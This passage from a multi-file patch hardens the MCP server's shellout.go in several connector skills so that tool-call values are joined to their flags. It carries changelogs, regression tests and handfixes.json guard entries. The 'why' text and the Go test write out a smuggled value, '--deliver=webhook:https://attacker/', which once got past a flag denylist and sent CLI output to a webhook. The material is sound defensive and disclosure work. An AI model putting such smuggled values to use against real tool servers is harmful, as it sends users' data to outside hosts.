      "not_contains": "2099-01-01T00:00:00Z"
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/mspbots/CHANGELOG.md
+++ b/skills/mspbots/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/mspbots/CHANGELOG.md
+++ b/skills/mspbots/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/mspbots/CHANGELOG.md
+++ b/skills/mspbots/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/mspbots/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/mspbots/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/mspbots/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/mspbots/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/mspbots/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/mspbots/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/mspbots/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/mspbots/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/mspbots/handfixes.json
+++ b/skills/mspbots/handfixes.json
@@ -126,6 +126,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/mspbots/handfixes.json
+++ b/skills/mspbots/handfixes.json
@@ -141,8 +141,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -152,7 +164,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/n-central/CHANGELOG.md
+++ b/skills/n-central/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/n-central/CHANGELOG.md
+++ b/skills/n-central/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/n-central/CHANGELOG.md
+++ b/skills/n-central/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/n-central/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/n-central/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/n-central/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/n-central/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/n-central/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/n-central/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/n-central/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/n-central/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/n-central/handfixes.json
+++ b/skills/n-central/handfixes.json
@@ -126,6 +126,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/n-central/handfixes.json
+++ b/skills/n-central/handfixes.json
@@ -141,8 +141,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -152,7 +164,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/nerdio/CHANGELOG.md
+++ b/skills/nerdio/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-09-01

